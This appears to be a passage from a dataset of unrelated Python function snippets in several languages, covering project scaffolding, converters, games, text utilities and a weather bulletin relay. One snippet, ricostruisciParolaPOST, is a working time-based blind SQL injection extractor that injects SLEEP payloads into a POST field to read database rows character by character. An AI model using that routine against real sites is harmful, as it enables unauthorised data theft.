Scripts...\"\n\tsubprocess.call(\"mkdir Scripts\", shell=True)\t#directorio scripts *\n\tprint \"Se ha Creado el Proyecto\", pname, \"con Exito!!\"\n \n\t#Se crea el codigo de verificacion del proyecto\n\tfor i in range(0, 15):\n\t\tx = random.randint(1, 10000000)\t#Calcula numeros aleatorios de 1 a 10,000,000(10 millones)\n\t\tVerifiCode = x\t\t\t\t\t#VerifiCode deja el valor de 0 y toma el valor de x\n\t\tCodeValue = bin(VerifiCode)\t\t#Encripta el codigo a binario\n\n\n\tprint \"Su codigo de proyecto es:\", CodeValue + \"\\n\"\n\tprint \"Realizando copias de archivos prioritarios a los servidores...\"\n\tpcommands.ServerCopy()\n\tprint \"Copias realizadas con exito!!\"", "def Inicio():\n menu = \"\"\"\n Bienvenido al conversor de monedas 💰\n\n 1 - Pesos colombianos\n 2 - Pesos argentinos\n 3 - Pesos mexicanos\n\n Elige una opción: \"\"\"\n\n opcion = int(input(menu))\n \n if opcion == 1:\n moneda = 'pesos colombianos'\n elif opcion == 2:\n moneda = 'pesos argentinos'\n elif opcion == 3:\n moneda = 'pesos mexicanos'\n else:\n print(f'La opción no es valida')\n\n if opcion == 1 or opcion == 2 or opcion == 3 :\n cambio = conversor(moneda)\n print(f'La cantidad de {cambio[1]} {moneda} en dólares es de {cambio[0]} USD')", "def cargar_tablero(tablero):\n try:\n if tablero == \"facil\":\n base = open(os.path.join(absolute_path,\"lib\",\"info\",\"boards\",\"facil.json\"),\"r\",encoding='utf8')\n elif tablero == \"medio\":\n base = open(os.path.join(absolute_path,\"lib\",\"info\",\"boards\",\"medio.json\"),\"r\",encoding='utf8')\n elif tablero == \"guardado\":\n base = open(os.path.join(absolute_path,\"lib\",\"info\",\"saves\",\"guardado.json\"),\"r\",encoding='utf8')\n else:\n base = open(os.path.join(absolute_path,\"lib\",\"info\",\"boards\",\"dificil.json\"),\"r\",encoding='utf8')\n tablero = json.load(base)\n tab = convertirDic(tablero)\n return tab\n except (FileNotFoundError):\n return None", "def icao(mesaj):\n fsicao = open(\"mesaj.icao_intrare\", \"w\")\n for cuvant in mesaj.split(' '):\n for litera in cuvant:\n fsicao.write(' '.join(extrage_litere(litera.lower())))\n fsicao.write(' ')\n fsicao.write('\\n')\n fsicao.close()", "def getApellidos(apellido):\n texto = f'El apellido es: {apellido}'\n return texto\n pass", "def createNew(string):\n image=Image.open('imageGenerator/images/images.jpg').convert('RGBA')\n\n fnt = ImageFont.truetype(\"fonts/arial.ttf\", 25)\n d = ImageDraw.Draw(image)\n\n d.text((10,10), string, font=fnt, fill=(255,255,255,128))\n\n d.text((10,60), \"World\", fill=(255,255,255,255))\n file=byt()\n image.save(file,'jpeg')\n return file.getvalue()", "def gerar_livro(nome, genero):\n if genero == \"Genérico\":\n livro = Generico(nome)\n elif genero == \"Ficção\":\n livro = Ficcao(nome)\n elif genero == \"Não Ficção\":\n livro = NaoFiccao(nome)\n elif genero == \"Técnico\":\n livro = Tecnico(nome)\n return livro", "def newprojcode(name):\n\tprint \"\\n======Creando Nuevo Proyecto======\\n\"\n\tproject_name = name\n\n\tif project_name == \"\" or project_name == None:\n\t\tcancel()\n\n\tprint \"*Nombre del Proyecto: \", project_name\n\n\tproject_languges = raw_input(\"*Lenguaje: \")\n\tpname = project_name\n\n\tprint \"\\n==================================\\n\"\n\n\tdirectory = str(\"Project_\" + pname + \"/\")\n\n\tif os.path.exists(\"Project\"):\n\t\t#Nos ubicamos en el directorio raiz del Proyecto\n\t\tsubprocess.call([\"mkdir\", directory], shell=True)\n\t\tprint \"Creando el Directorio Raiz...\"\n\telse:\n\t\tos.mkdir(\"Project\")\n\t\tos.chdir(\"Project/\")\n\t\tsubprocess.call([\"mkdir\", directory])\n\t\tif not os.path.exists(directory):\n\t\t\tprint \"LA CARPETA {} NO EXISTE!\".format(directory)\n\t\t\tcancel()\n\t\telse:\n\t\t\tos.chdir(directory)\n\n\tdirs = \"Project\" + pname + \"/\"\n\t#Nos ubicamos en el directorio raiz del Proyecto\n\tos.chdir(dirs)\n\tprint \"Accediendo al Directorio\", dirs + \"...\"\n\tprint \"Creando el Directorio de Iconos...\"\n\tsubprocess.call(\"mkdir Iconos\", shell=True)\t\t#directorio iconos *\n\tprint \"Creando el Directorio de Debug...\"\n\tsubprocess.call(\"mkdir Debug\", shell=True)\t\t#directorio debug *\n\tprint \"Crenado el Directoiro de Scripts...\"\n\tsubprocess.call(\"mkdir Scripts\", shell=True)\t#directorio scripts *\n\tprint \"Creando los Archivos XML del Proyecto...\\n\"\n\tsubprocess.call(\"source XMLProjectFiles.sh\", shell=True)\n\tprint \"Se ha Creado el Proyecto\", pname, \" con Exito!!\"\n\n\t#Se crea el codigo de verificacion del proyecto\n\tfor i in range(0, 15):\n\t\tx = random.randint(1, 1000000)\t#Calcula numeros aleatorios de 1 a 1,000,000(1 millon)\n\t\tVerifiCode = x\t\t\t\t\t#VerifiCode deja el valor de 0 y toma el valor de x\n\t\tCodeValue = bin(VerifiCode)\t\t#Encripta el codigo a binario\n\n\tprint \"Su codigo de proyecto es:\", CodeValue + \"\\n\"\n\tSaveKey(CodeValue)\n\tprint \"Realizando copias de archivos prioritarios a los servidores...\"\n\tpcommands.ServerCopy()\n\tprint \"Copias realizadas con exito!!\"", "def cabecalho(dic_cabecalho,dat_ordem,imagem):\n\n tmp=''\n tmp+='\\t\\t\\t\\t<image x=\"4.1cm\" y=\"26.9cm\" width=\"74\" height=\"60\" file=\"' + imagem + '\"/>\\n'\n tmp+='\\t\\t\\t\\t<lines>3.3cm 26.3cm 19.5cm 26.3cm</lines>\\n'\n tmp+='\\t\\t\\t\\t<setFont name=\"Helvetica-Bold\" size=\"15\"/>\\n'\n tmp+='\\t\\t\\t\\t<drawString x=\"6.7cm\" y=\"28.1cm\">' + dic_cabecalho['nom_casa'] + '</drawString>\\n'\n tmp+='\\t\\t\\t\\t<setFont name=\"Helvetica\" size=\"11\"/>\\n'\n tmp+='\\t\\t\\t\\t<drawString x=\"6.7cm\" y=\"27.6cm\">' + 'Estado de ' + dic_cabecalho['nom_estado'] + '</drawString>\\n'\n return tmp", "def mostrEmpl2(finalData): #Esta sección fue hecha por Ángel\n listaUE = []\n for elemento in finalData:\n nombre = elemento[0]\n listaUE.append(nombre) \n return listaUE", "def do_ascii(catalog):\n task_str = catalog.get_current_task_str()\n\n\n # Howerton Catalog\n datafile = os.path.join(catalog.get_current_task_repo(), 'ASCII',\n 'vizier_J_MNRAS_441_1186_table1 J_MNRAS_441_1186_table3_20200403.csv')\n data = read(datafile, format='csv')\n for rrow in pbar(data, task_str):\n row = dict((x, str(rrow[x])) for x in rrow.columns)\n# if any(x in row['Notes'].lower() for x in ['artifact']):\n# continue\n# ctypes = row['Type'].split('/')\n# nonsne = False\n# for ct in ctypes:\n# if ct.replace('?', '') in catalog.nonsnetypes:\n# nonsne = True\n# else:\n# nonsne = False\n# break\n# if nonsne:\n# continue\n name, source = catalog.new_entry(\n row['CRTS'],\n srcname='CRTS',\n bibcode='2014MNRAS.441.1186D')\n# if row['IAU des.'] != '--':\n# catalog.entries[name].add_quantity(SUPERNOVA.ALIAS,\n# row['IAU des.'], source)\n# for ct in ctypes:\n# catalog.entries[name].add_quantity(SUPERNOVA.CLAIMED_TYPE, ct,\n# source)\n# catalog.entries[name].add_quantity(SUPERNOVA.DISCOVERER,\n# row['Discoverer'], source)\n# date = row['Discovery'].split('/')\n# date = '/'.join([date[-1].zfill(2), date[0].zfill(2), date[1]])\n# catalog.entries[name].add_quantity(SUPERNOVA.DISCOVER_DATE, date,\n# source)\n catalog.entries[name].add_quantity(CATACLYSMIC.VISUAL_MAG, row['Vmax'],\n source)\n catalog.entries[name].add_quantity(CATACLYSMIC.RA, row['RAJ2000'], source)\n catalog.entries[name].add_quantity(CATACLYSMIC.DEC, row['DEJ2000'], source)\n catalog.journal_entries()\n\n # Howerton Catalog", "def ficha(nome = '<desconhecido>', gols = 0):\n print(f'O jogador {nome} fez {gols} gol(s) no campeonato.')", "def refang(self, text: str):", "def exemple():\r\n\r\n case_1 = \"\\u25CC\"\r\n case_1 = u\"{}\".format(case_1)\r\n fourmi_1_1 = \"\\u22C0\"\r\n fourmi_1_1 = u\"{}\".format(fourmi_1_1)\r\n fourmi_2_1 = \"\\u21CA\"\r\n fourmi_2_1 = u\"{}\".format(fourmi_2_1)\r\n fourmi_3_1 = \"\\u25BC\"\r\n fourmi_3_1 = u\"{}\".format(fourmi_3_1)\r\n fourmi_1_2 = \"\\u22C0\"\r\n fourmi_1_2 = u\"{}\".format(fourmi_1_2)\r\n fourmi_2_2 = \"\\u21C8\"\r\n fourmi_2_2 = u\"{}\".format(fourmi_2_2)\r\n fourmi_3_2 = \"\\u25B2\"\r\n fourmi_3_2 = u\"{}\".format(fourmi_3_2)\r\n clods_1 = \"\\u2726\"\r\n clods_1 = u\"{}\".format(clods_1)\r\n clods_2 = \"\\u2737\"\r\n clods_2 = u\"{}\".format(clods_2)\r\n clods_3 = \"\\u2739\"\r\n clods_3 = u\"{}\".format(clods_3)\r\n \r\n print(term.move_xy(82,3) + term.white + 'DEPOT : ' + (case_1))\r\n print(term.move_xy(82,5) + term.white + 'Clods de niveau 1 : ' + (clods_1))\r\n print(term.move_xy(82,6) + term.white + 'Clods de niveau 2 : ' + (clods_2))\r\n print(term.move_xy(82,7) + term.white + 'Clods de niveau 3 : ' + (clods_3))\r\n print(term.move_xy(82,8) + term.white + 'Fourmis de niveau 1 : ' + (fourmi_1_1) + ' ' + (fourmi_1_2))\r\n print(term.move_xy(82,9) + term.white + 'Fourmis de niveau 2 : ' + (fourmi_2_1) + ' ' + (fourmi_2_2))\r\n print(term.move_xy(82,10) + term.white + 'Fourmis de niveau 3 : ' + (fourmi_3_1) + ' ' + (fourmi_3_2))\r\n print(term.move_xy(82,12) + term.white + 'Joueur 1 vous jouez en rouge.')\r\n print(term.move_xy(82,13) + term.white + 'Joueur 2 vous jouez en jaune.')", "def mostra_palavra(palavra):\n pal = ' '.join(palavra)\n print 'Palavra:'\n print pal\n print", "def mostra_palavra(palavra):\n pal = ' '.join(palavra)\n print 'Palavra:'\n print pal\n print", "def comando(accion,_):\r\n return array_comandos", "def args_str(self):", "def get_texte(name):\r\n #with open(name, 'r', encoding='utf-8') as myfile:\r\n with open(name, 'r', encoding='utf-8') as myfile:\r\n data=myfile.read()\r\n return data", "def ricostruisciParolaPOST(length,nomeTabella,nomeColonna,indice,condizioneWhere):\n value=\"\"\n for i in range(1,length+1):\n trovato=False\n min =0\n max=256\n\n if(OptionConfiguration.typeOfValue==\"string\"):\n while (trovato == False):\n if (min <= max):\n # print (min,max)\n mid= min+int((max-min)//2)\n dataToSent = OptionConfiguration.data.copy()\n # modifico il valore injectable\n if(condizioneWhere==None):\n dataToSent[OptionConfiguration.valueInjectable] = dataToSent[\n OptionConfiguration.valueInjectable] + \\\n \"' AND (ORD(MID((SELECT %s FROM %s LIMIT %s,1 ),%s,1)) = %s) \" % (\n nomeColonna, nomeTabella, indice,i, mid)+ \\\n \" AND SLEEP(%s) -- -\" % (\n OptionConfiguration.timeToWait)\n\n else:\n dataToSent[OptionConfiguration.valueInjectable] = dataToSent[\n OptionConfiguration.valueInjectable] + \\\n \"' AND (ORD(MID((SELECT %s FROM %s WHERE %s LIMIT %s,1 ),%s,1)) = %s) \" % (\n nomeColonna, nomeTabella,condizioneWhere, indice, i,\n mid) + \\\n \" AND SLEEP(%s) -- -\" % (\n OptionConfiguration.timeToWait)\n\n start = time.time()\n req = requests.post(\"%s\" % (OptionConfiguration.destination[0]), dataToSent)\n req.content\n req.close()\n end = time.time()\n\n # se succede questo allora lo abbiamo trovato\n if ((end - start )> OptionConfiguration.timeToWait):\n start = time.time()\n req = requests.post(\"%s\" % (OptionConfiguration.destination[0]), dataToSent)\n req.content\n req.close()\n end = time.time()\n\n #print (end, start, chr(mid),req.elapsed.total_seconds())\n # se succede questo allora lo abbiamo trovato\n if ((end - start) > OptionConfiguration.timeToWait):\n #carattere troato\n trovato = True\n value=value+chr(mid)\n print chr(mid),\n break\n else:\n dataToSent = OptionConfiguration.data.copy()\n if(condizioneWhere==None):\n dataToSent[OptionConfiguration.valueInjectable] = dataToSent[\n OptionConfiguration.valueInjectable] + \\\n \"' AND (ORD(MID((SELECT %s FROM %s LIMIT %s,1 ),%s,1)) > %s) \" % (\n nomeColonna, nomeTabella, indice,i, mid) + \\\n \" AND SLEEP(%s) -- -\" % (\n OptionConfiguration.timeToWait)\n else:\n dataToSent[OptionConfiguration.valueInjectable] = dataToSent[\n OptionConfiguration.valueInjectable] + \\\n \"' AND (ORD(MID((SELECT %s FROM %s WHERE %s LIMIT %s,1 ),%s,1)) > %s) \" % (\n nomeColonna, nomeTabella,\n condizioneWhere, indice, i,\n mid) + \\\n \" AND SLEEP(%s) -- -\" % (\n OptionConfiguration.timeToWait)\n\n start = time.time()\n req = requests.post(\"%s\" % (OptionConfiguration.destination[0]), dataToSent)\n req.content\n req.close()\n end = time.time()\n\n # sono nella ,eta superiore\n if ((end - start) > OptionConfiguration.timeToWait):\n start = time.time()\n req = requests.post(\"%s\" % (OptionConfiguration.destination[0]), dataToSent)\n req.content\n req.close()\n end = time.time()\n\n # sono nella ,eta superiore\n if ((end - start) > OptionConfiguration.timeToWait):\n min = mid + 1\n # sono nella meta inferiore\n else:\n max = mid-1\n else:\n break\n\n # parametro intero\n else:\n\n while (trovato == False):\n if (min <= max):\n # print (min,max)\n mid= min+int((max-min)//2)\n dataToSent = OptionConfiguration.data.copy()\n\n if(condizioneWhere==None):\n # modifico il valore injectable\n dataToSent[OptionConfiguration.valueInjectable] = dataToSent[\n OptionConfiguration.valueInjectable] + \\\n \" AND (ORD(MID((SELECT %s FROM %s LIMIT %s,1 ),%s,1)) = %s) \" % (\n nomeColonna, nomeTabella, indice,i, mid) + \\\n \" AND SLEEP(%s) \" % (\n OptionConfiguration.timeToWait)\n else:\n dataToSent[OptionConfiguration.valueInjectable] = dataToSent[\n OptionConfiguration.valueInjectable] + \\\n \" AND (ORD(MID((SELECT %s FROM %s WHERE %s LIMIT %s,1 ),%s,1)) = %s) \" % (\n nomeColonna, nomeTabella, condizioneWhere,\n indice, i,\n mid) + \\\n \" AND SLEEP(%s) \" % (\n OptionConfiguration.timeToWait)\n\n start = time.time()\n req = requests.post(\"%s\" % (OptionConfiguration.destination[0]), dataToSent)\n req.content\n req.close()\n end = time.time()\n # se succede questo allora lo abbiamo trovato\n #time of execution for control\n #print (end-start),chr(mid),req.elapsed.total_seconds()\n if ((end - start) > OptionConfiguration.timeToWait):\n\n start = time.time()\n req = requests.post(\"%s\" % (OptionConfiguration.destination[0]), dataToSent)\n req.content\n req.close()\n end = time.time()\n if ((end - start) >OptionConfiguration.timeToWait):\n trovato = True\n value = value + chr(mid)\n print chr(mid),\n break\n\n # carattere trovato\n else:\n dataToSent = OptionConfiguration.data.copy()\n if(condizioneWhere==None):\n dataToSent[OptionConfiguration.valueInjectable] = dataToSent[\n OptionConfiguration.valueInjectable] + \\\n \" AND (ORD(MID((SELECT %s FROM %s LIMIT %s,1 ),%s,1)) > %s) \" % (\n nomeColonna, nomeTabella, indice,i, mid)+ \\\n \" AND SLEEP(%s)\" % (\n OptionConfiguration.timeToWait)\n else:\n dataToSent[OptionConfiguration.valueInjectable] = dataToSent[\n OptionConfiguration.valueInjectable] + \\\n \" AND (ORD(MID((SELECT %s FROM %s WHERE %s LIMIT %s,1 ),%s,1)) > %s) \" % (\n nomeColonna, nomeTabella,condizioneWhere, indice, i,\n mid) + \\\n \" AND SLEEP(%s) \" % (\n OptionConfiguration.timeToWait)\n\n\n start = time.time()\n req = requests.post(\"%s\" % (OptionConfiguration.destination[0]), dataToSent)\n req.content\n req.close()\n end = time.time()\n\n # sono nella ,eta superiore\n if ((end - start) >= OptionConfiguration.timeToWait):\n start = time.time()\n req = requests.post(\"%s\" % (OptionConfiguration.destination[0]), dataToSent)\n req.content\n req.close()\n end = time.time()\n\n # sono nella ,eta superiore\n if ((end - start) >= OptionConfiguration.timeToWait):\n min = mid + 1\n # sono nella meta inferiore\n else:\n max = mid-1\n else:\n break\n print(\"\")\n print (OptionConfiguration.bcolors.BOLD+\"value find -> \"+ value+OptionConfiguration.bcolors.ENDC)\n print(\"\")\n return value", "def create_str(it):\n key = it[\"AND_KEY\"]\n val = it[language[0]]\n if val.startswith(\"<ubt_string-array>\"):\n rel = val.replace(\"<ubt_string-array>\", \"\").replace(\"</ubt_string-array>\", \"\")\n arr_str = rel.split(\"<ubt/>\")\n rel = f\"<string-array name=\\\"{key}\\\">\"\n for s in arr_str:\n s = s.replace(\"\\\"\", \"\\\\\\\"\")\n rel += f\"<item>{s}</item>\"\n rel += \"</string-array>\"\n return rel\n else:\n val = val.replace(\"\\\\\", \"\")\n val = val.replace(\"'\", \"\\\\'\")\n val = val.replace(\"\\\"\", \"\\\\\\\"\")\n return f\"<string name=\\\"{key}\\\">{val}</string>\"", "def encode(self, strs):", "def encode(self, strs):", "def EnglishToPig(str):\r\n\r\n # TODO: Your code here\r\n\r\n\r\n # Change the return to return the converted string\r\n return(\"\")", "def andar(self, nome, comando):\n sai = json.loads(self.orm.get_mapa(self.orm.get_global(nome).local).saidas)\n if comando not in sai.keys():\n return 'esse local nao existe! nao o enchergo daqui...'\n\n self.orm.update_global(nome, local=sai[comando])\n irs = self.orm.get_mapa(self.orm.get_global(nome).local).nome_amigavel.split('|')[0]\n return f'voçê foi para {irs}'", "def get_string(self, **kwargs):\n ...", "def ej08a(texto):\n indice = 0\n resultado = []\n current_byte = \"\"\n\n for i in texto:\n current_byte += i # se agrega el nuevo caracter al byte actual\n indice += 1 # se incrementa en uno el indice\n if indice % 8 == 0:\n # Comienza un nuevo byte\n resultado.append(current_byte)\n current_byte = \"\"\n return resultado", "def get_pi_as_string():\n\n request = requests.get(\"http://www.eveandersson.com/pi/digits/10000\")\n doc = BeautifulSoup(request.text, \"html.parser\").select_one(\"pre\").text.strip()\n pi_string = doc.replace(\" \", \"\").replace(\".\", \"\").replace(\"\\n\", \"\")\n return pi_string", "def travailler_enveloppes(self, enveloppes):\n elements = enveloppes[\"l\"]\n elements.apercu = \"{valeur}\"\n elements.aide_courte = \\\n \"Entrez |ent|le nom d'un rang|ff| pour l'éditer ou :\\n\" \\\n \" |ent|/a <nom de l'élément à créer> / <probabilité> / <points> \" \\\n \"|ff|\\n (Exemple : |cmd|/a bras gauche / 8 / 3|ff|)\\n\" \\\n \" |ent|/s <nom de l'élément à supprimer>|ff|\\n\\n\" \\\n \"La probabilité de toucher un élément est calculée en \" \\\n \"fonciton\\nde la probabilité totale de tous les éléments.\\n\\n\" \\\n \"Éléments actuels de la cible :{valeur}\"", "def compose_url(base_url, anno, chimico):\n \n return base_url + chimico + '_' + anno + '.txt'", "def gene_txt_of_load(dirname):\n str_list=[]\n list_name=[]\n print 'Yolo Debut'\n for file in os.listdir(dirname):\n if file.endswith(\".npy\"):\n str_list.append(file[:-4]+'=np.load(dirname+'+'\\\"/\\\"'+'+\\\"'+file+'\\\")')\n list_name.append(file[:-4])\n print '\\n'.join(str_list)\n print ','.join(list_name)\n return str_list", "def on_pushButton_2_clicked(self):\n # TODO: not implemented yet\n try:\n str='str.png'\n process_pic.graphics ().process (str)\n self.click=\"process\"\n pixMap = QPixmap(\"temp.png\").scaled(self.label.width(),self.label.height())\n self.label.setPixmap(pixMap)\n except:\n button=QMessageBox.about(self, '注意', '应先向空白处导入图片后再进行处理')\n else:\n pass\n\n\n\n #os.popen('python process_pic.py')", "def encode_strings(self):\n self.version = u2b_if_py2(self.version)\n self.short = u2b_if_py2(self.short)\n self.description = u2b_if_py2(self.description)\n self.target = u2b_if_py2(self.target)\n self.services = [u2b_if_py2(s) for s in self.services]\n self.ports = [(u2b_if_py2(po),u2b_if_py2(pr)) for (po,pr) in self.ports]\n self.protocols = [u2b_if_py2(pr) for pr in self.protocols]\n self.icmp_blocks = [u2b_if_py2(i) for i in self.icmp_blocks]\n self.forward_ports = [(u2b_if_py2(p1),u2b_if_py2(p2),u2b_if_py2(p3),u2b_if_py2(p4)) for (p1,p2,p3,p4) in self.forward_ports]\n self.source_ports = [(u2b_if_py2(po),u2b_if_py2(pr)) for (po,pr)\n in self.source_ports]\n self.interfaces = [u2b_if_py2(i) for i in self.interfaces]\n self.sources = [u2b_if_py2(s) for s in self.sources]\n self.rules = [u2b_if_py2(s) for s in self.rules]", "def get_string2(self):\n pass", "async def ascii(self, ctx, *args):\n self.logger.info(misolog.format_log(ctx, f\"\"))\n text = \" \".join(args)\n response = requests.get(f\"https://artii.herokuapp.com/make?text={text}\")\n content = f\"```{response.content.decode('utf-8')}```\"\n await ctx.send(content)", "def tah(pole, cislo_policka, symbol):\n list_pole[cislo_policka] = symbol \n pole = \"\".join(list_pole)\n print(pole)\n return pole", "def createDataString(self, *data):\n\n dataString = ':'.join(data)\n nbBytesToComplete = self.nbBytesMax - len(self.dataString) - 1\n\n #print(len(self.dataString),self.dataString)\n return dataString + ''.join([' ' for loop in range(nbBytesToComplete)]) + '/'\n #print(len(self.dataString),self.dataString)", "def __init__(self, name_map):\n self.name_map = name_map\n self.read = gpd.read_file(self.name_map)\n self.read = self.read.replace({self.read[\"NOMBRE_DPT\"][32]:'SAN ANDRES',\n self.read[\"NOMBRE_DPT\"][2]:'BOGOTA'})\n self.ordenado = ordenar(self.read,\"NOMBRE_DPT\")", "def main():\n \n # Création du dictionnaire de référence\n roman = \"la-jangada.txt\"\n # fichier_test = \"texte-de-test.txt\"\n liste_caracteres_ref = extraction_caracteres(roman)\n liste_caracteres_ref = nettoyage(liste_caracteres_ref)\n liste_caracteres_ref = transformation_accents(liste_caracteres_ref)\n liste_caracteres_ref = transformation_minuscules(liste_caracteres_ref)\n\n dict_car_ref = creation_dict_car(liste_caracteres_ref)\n dict_car_ref = analyse_dict_car(dict_car_ref)\n# print(dict_car_ref)\n \n# affichage_dict(dict_car_ref)\n liste_cles_ref = creation_liste_cles_triees(dict_car_ref)\n print(\"----------------------------------------\")\n print(liste_cles_ref)\n\n # Analyse du texte chiffré\n texte = \"texte-chiffre.txt\"\n liste_caracteres_chif = extraction_caracteres(texte)\n liste_caracteres_chif = nettoyage(liste_caracteres_chif)\n \n dict_car_chif = creation_dict_car(liste_caracteres_chif)\n dict_car_chif = analyse_dict_car(dict_car_chif)\n# print(dict_car_chif)\n print(\"----------------------------------------\")\n# affichage_dict(dict_car_chif)\n print(\"----------------------------------------\")\n liste_cles_chif = creation_liste_cles_triees(dict_car_chif)\n print(liste_cles_chif)", "def URI_to_FILE(self,Nom,uri):\n tab=[]\n certs=self.MaBdd.get_orphan_by_obj(Nom)\n if certs:\n for cert in certs:\n tab.append(cert[0]+' : '+cert[1])\n tab.append('Les CVE')\n allcpe=self.MaBdd.get_tab_all_cpe_uri(uri)\n \n if allcpe:\n title=['CRC','CVE','Conf','OPE','Vuln','CPE','Start_excl','Start_incl','End_excl','End_incl','New']\n lgmax=self.Get_max_lg(allcpe,title)\n #0 c'est le CRC \n tab.append(\"|\".join([f\"{title[x]:{lgmax[x]}}\" for x in range(1,10)]))\n delta=lgmax[1]+lgmax[2]+lgmax[3] + 3\n test=\"test de repetition\"\n for cpe in allcpe:\n testlg=cpe[1]+'_'+str(cpe[2])+'_'+cpe[3]\n if test==testlg:\n mini=\"|\".join([f\"{cpe[x]:{lgmax[x]}}\" for x in range(4,10)])\n tab.append(f\"{' ':{delta}}{mini}\")\n else:\n tab.append(\"|\".join([f\"{cpe[x]:{lgmax[x]}}\" for x in range(1,10)]))\n test=cpe[1]+'_'+str(cpe[2])+'_'+cpe[3]\n file=file=open(f\"mogs/{Nom}.txt\",'w',encoding='utf-8')\n file.writelines('\\n'.join(tab))\n file.close()", "def save_string_xyz(self, save_ghosts=True, save_natom=False):\n factor = 1.0 if self.PYunits == 'Angstrom' else psi_bohr2angstroms\n\n N = self.natom()\n if not save_ghosts:\n N = 0\n for i in range(self.natom()):\n if self.Z(i):\n N += 1\n text = ''\n if save_natom:\n text += \"%d\\n\" % (N)\n text += '%d %d %s\\n' % (self.molecular_charge(), self.multiplicity(), self.tagline)\n\n for i in range(self.natom()):\n [x, y, z] = self.atoms[i].compute()\n if save_ghosts or self.Z(i):\n text += '%2s %17.12f %17.12f %17.12f\\n' % ((self.symbol(i) if self.Z(i) else \"Gh\"), \\\n x * factor, y * factor, z * factor)\n return text", "def real_process(raw):\n\n prod = product.TextProduct(raw)\n pil = prod.afos[:3]\n wfo = prod.source[1:]\n # sigh, can't use originating center for the route\n if (pil == \"OEP\"):\n wfo = prod.afos[3:]\n\n #raw = raw.replace(\"'\", \"\\\\'\")\n sqlraw = raw.replace(\"\\015\\015\\012\", \"\\n\").replace(\"\\000\", \"\").strip()\n\n # FTM sometimes have 'garbage' characters included, get em out\n #if (pil == \"FTM\"):\n # sqlraw = re.sub(\"[^\\n\\ra-zA-Z0-9:\\.,\\s\\$\\*]\", \"\", sqlraw)\n\n # Always insert the product into the text archive database\n product_id = prod.get_product_id()\n sql = \"\"\"INSERT into text_products(product, product_id) values (%s,%s)\"\"\"\n myargs = (sqlraw, product_id)\n if (len(prod.segments) > 0 and prod.segments[0].sbw):\n giswkt = 'SRID=4326;%s' % (MultiPolygon([prod.segments[0].sbw]).wkt,)\n sql = \"\"\"INSERT into text_products(product, product_id, geom) values (%s,%s,%s)\"\"\" \n myargs = (sqlraw, product_id, giswkt)\n deffer = POSTGIS.runOperation(sql, myargs)\n deffer.addErrback( common.email_error, sqlraw)\n myurl = \"%s?pid=%s\" % (config.get('urls', 'product'), product_id)\n\n xtra = {\n \"product_id\": product_id,\n }\n\n # Just send with optional headline to rooms...\n if SIMPLE_PRODUCTS.__contains__(pil):\n xtra['channels'] = wfo\n if pil in NEW_ROUTING:\n xtra['channels'] = prod.afos\n prodtxt = \"(%s)\" % (pil,)\n if reference.prodDefinitions.has_key(pil):\n prodtxt = reference.prodDefinitions[pil]\n\n mess = \"%s: %s issues %s %s\" % (wfo, wfo, prodtxt, myurl)\n htmlmess = \"%s issues <a href=\\\"%s\\\">%s</a> \" % (centertext.get(wfo,wfo), myurl, prodtxt)\n if (not [\"HWO\",\"NOW\",\"ZFP\"].__contains__(pil) and \n len(prod.segments) > 0 and \n len(prod.segments[0].headlines) > 0 and \n len(prod.segments[0].headlines[0]) < 200 ):\n htmlmess += \"... %s ...\" % (prod.segments[0].headlines[0],)\n\n jabber.sendMessage(mess, htmlmess, xtra)\n\n channels = [wfo,]\n if pil in NEW_ROUTING:\n channels = [prod.afos,]\n # TODO: remove manual hack\n if prod.afos == 'RFDBIS':\n channels = ['BIS',]\n # Also send message to any 'subscribing WFO chatrooms'\n for key in routes.keys():\n if (re.match(key, prod.afos)):\n for wfo2 in routes[key]:\n mess = \"%s: %s issues %s %s\" % \\\n (wfo2, wfo, prodtxt, myurl)\n jabber.sendMessage(mess, htmlmess, xtra)\n channels.append( wfo2 )\n\n twt = prodtxt\n url = myurl\n common.tweet(channels, twt, url)\n if prod.afos == \"PNSARX\":\n snowfall_pns(prod)\n # We are done for this product\n return\n\n\n # Now, lets look at segments ?\n if (pil == \"RVF\"):\n for seg in prod.segments:\n tokens = re.findall(\"\\.E ([A-Z0-9]{5}) \", seg.raw)\n if (len(tokens) == 0):\n print 'Whoa, did not find NWSLI?', seg\n return\n hsas = re.findall(\"HSA:([A-Z]{3}) \", seg.raw)\n prodtxt = reference.prodDefinitions[pil]\n mess = \"%s: %s issues %s\" % \\\n (wfo, wfo, prodtxt)\n htmlmess = \"%s issues <a href=\\\"%s\\\">%s</a> for \" \\\n % (wfo, myurl, prodtxt)\n usednwsli = {}\n hsa_cnt = -1\n rivers = {}\n for nwsli in tokens:\n if usednwsli.has_key(nwsli):\n continue\n usednwsli[nwsli] = 1\n hsa_cnt += 1\n if (nwsli_dict.has_key(nwsli)):\n rname = nwsli_dict[nwsli]['rname']\n r = nwsli_dict[nwsli]['river']\n else:\n rname = \"((%s))\" % (nwsli,)\n r = \"Unknown River\"\n if not rivers.has_key(r):\n rivers[r] = \"<br/>%s \" % (r,)\n if len(hsas) > hsa_cnt and \\\n reference.wfo_dict.has_key( hsas[hsa_cnt] ):\n uri = AHPS_TEMPLATE[ reference.wfo_dict[hsas[hsa_cnt]]['region'] ] %\\\n (hsas[hsa_cnt].lower(), nwsli.lower() ) \n rivers[r] += \"<a href=\\\"%s\\\">%s</a> (%s), \" % (uri, rname, nwsli)\n else:\n rivers[r] += \"%s (%s), \" % (rname, nwsli)\n for r in rivers.keys():\n htmlmess += \" %s\" % (rivers[r][:-2],)\n jabber.sendMessage(mess[:-1] +\" \"+ myurl, htmlmess[:-1], xtra)\n continue\n\n# PUBLIC ADVISORY NUMBER 10 FOR REMNANTS OF BARRY\n# TROPICAL DEPRESSION BARRY ADVISORY NUMBER 5\n# TROPICAL STORM BARRY INTERMEDIATE ADVISORY NUMBER 2A\n\n if (pil == \"TCM\" or pil == \"TCP\" or pil == \"TCD\"):\n mess = \"%s: %s issues %s %s\" % (wfo, wfo, pil, myurl)\n prodtxt = \"(%s)\" % (pil,)\n if reference.prodDefinitions.has_key(pil):\n prodtxt = reference.prodDefinitions[pil]\n htmlmess = \"%s issues <a href=\\\"%s\\\">%s</a> \" % (wfo, myurl, prodtxt)\n jabber.sendMessage(mess, htmlmess, xtra)\n \n common.tweet([wfo], prodtxt, myurl)\n\n\n for key in routes.keys():\n if (re.match(key, prod.afos)):\n channels = []\n for wfo2 in routes[key]:\n mess = \"%s: %s %s\" % \\\n (wfo2, prod.afos, myurl)\n htmlmess = \"<a href=\\\"%s\\\">%s</a>\" % (myurl, prodtxt)\n tokens = re.findall(\"(.*) 